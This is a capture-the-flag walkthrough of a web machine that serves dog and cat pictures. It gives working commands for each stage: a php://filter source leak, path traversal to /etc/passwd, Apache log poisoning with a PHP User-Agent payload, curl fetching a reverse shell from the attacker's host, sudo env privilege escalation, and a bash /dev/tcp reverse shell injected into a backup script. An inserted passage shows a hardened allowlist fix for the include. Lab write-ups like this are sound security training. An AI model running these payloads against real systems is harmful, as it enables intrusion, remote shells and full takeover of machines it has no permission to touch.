This is a medium-difficulty machine whose web page shows pictures of dogs and cats.
http://Machine_IP/?view=cat
So I tried some of the PHP filter wrappers and succeeded with this one:
http://Machine_IP/?view=php://filter/convert.base64-encode/resource=dog
Requesting this URL returns a base64-encoded string, the contents of dog.php.
So the wrapper is working.
Next we try ../index to retrieve the source of index.php:
http://Machine_IP/?view=php://filter/convert.base64-encode/resource=dog/../index
This returns a much longer base64 string, which must be the source of index.php.
Decode it:
$ echo "Base64_HASH" | base64 -d
The decoded source contains the important part:
<?php
function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
    if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
        echo 'Here you go!';
        include $_GET['view'] . $ext;
    } else {
        echo 'Sorry, only dogs or cats are allowed.';
    }
}
?>
The code only checks that 'dog' or 'cat' appears somewhere in view, then appends $ext, and $ext comes straight from the ext parameter, so we can set it ourselves; an empty ext drops the .php suffix:
http://Machine_IP/?view=dog/../../../../../../etc/passwd&ext=
This returns the /etc/passwd file.
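As an added defensive note (this is not code from the machine or from the original writeup): the include above is exploitable because containsStr is a substring match, so any path or php://filter URL that merely contains 'dog' or 'cat' passes, and because the client controls $ext. A hardened version keys the include off a fixed allowlist and ignores ext entirely; the ./pages directory layout is an assumption.

```php
<?php
// Added example: hardened replacement for the vulnerable include.
// Assumes the templates live in ./pages/ as cat.php and dog.php (assumed layout).

// Strict allowlist: the request parameter is a lookup key, never a path fragment.
$pages = [
    'cat' => 'cat.php',
    'dog' => 'dog.php',
];

// The client no longer controls the extension; $_GET['ext'] is not read at all.
$view = isset($_GET['view']) ? (string) $_GET['view'] : '';

if (!array_key_exists($view, $pages)) {
    http_response_code(400);
    echo 'Sorry, only dogs or cats are allowed.';
    exit;
}

// Defence in depth: even with an allowlist, confirm the resolved file
// really sits inside the intended directory before including it.
$base = realpath(__DIR__ . '/pages');
$path = ($base === false) ? false : realpath($base . '/' . $pages[$view]);

if ($path === false
    || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
    http_response_code(500);
    exit;
}

echo 'Here you go!';
include $path;
?>
```

With this version a request such as ?view=dog/../../../../etc/passwd&ext= fails the array_key_exists check and never reaches include.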
We can now read arbitrary files, but we want remote code execution. For that we look at the Apache access log:
http://Machine_IP/?view=dog/../../../../../../var/log/apache2/access.log&ext=
This displays the log file.
To get command execution we poison the log by sending a PHP payload in the User-Agent header:
curl "http://Machine_IP/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
When the log is included again we see a warning in it.
It says it cannot execute a blank command, because we did not give 'c' a value.
Let's give c a value, c=id:
http://Machine_IP/?view=dog/../../../../../../var/log/apache2/access.log&ext&c=id
The output of id appears in the log.
Now we can upload a reverse shell to the machine. Download the PHP reverse shell from pentestmonkey and edit the IP and port.
Then run a simple HTTP server with Python on your own machine:
python -m SimpleHTTPServer 80
Then pass the following command through the c parameter in the browser so the target downloads our PHP shell:
curl http://My_IP:80/shell.php -o shell.php
This places shell.php on the target machine; we can verify it with c=ls.
Now set up a netcat listener on our machine:
nc -lnvp 1234 (1234 is the port I set in the reverse shell)
In the browser, simply open shell.php:
http://Machine_IP/shell.php
Now we have a reverse shell.
$ /usr/bin/script -qc /bin/bash /dev/null
Running this command gives us a more stable interactive TTY.
Now we need to find the 4 flags.
The first flag is in /var/www/html.
The second flag is in /var/www.
Privilege Escalation:
Now we try to escalate privileges, since we do not have permission to read the root directory. First we check our sudo rights:
sudo -l
This shows we can run /usr/bin/env as root without a password.
Searching GTFOBins gives the following command:
sudo env /bin/sh
Now I am root.
The 3rd flag is in the root directory.
The 4th flag is a little tricky, because it is not inside this box; it is on some other file system. In /opt there is a backups directory containing two files, backup.sh and backup.tar, and these files have a connection to the other box. So we use the script to get a reverse connection to that machine:
echo "#! /bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/My_IP/4444 0>&1'" >> backup.sh
nc -lnvp 4444 (on our machine)
Wait a minute for the reverse connection.
Now we have the 4th flag.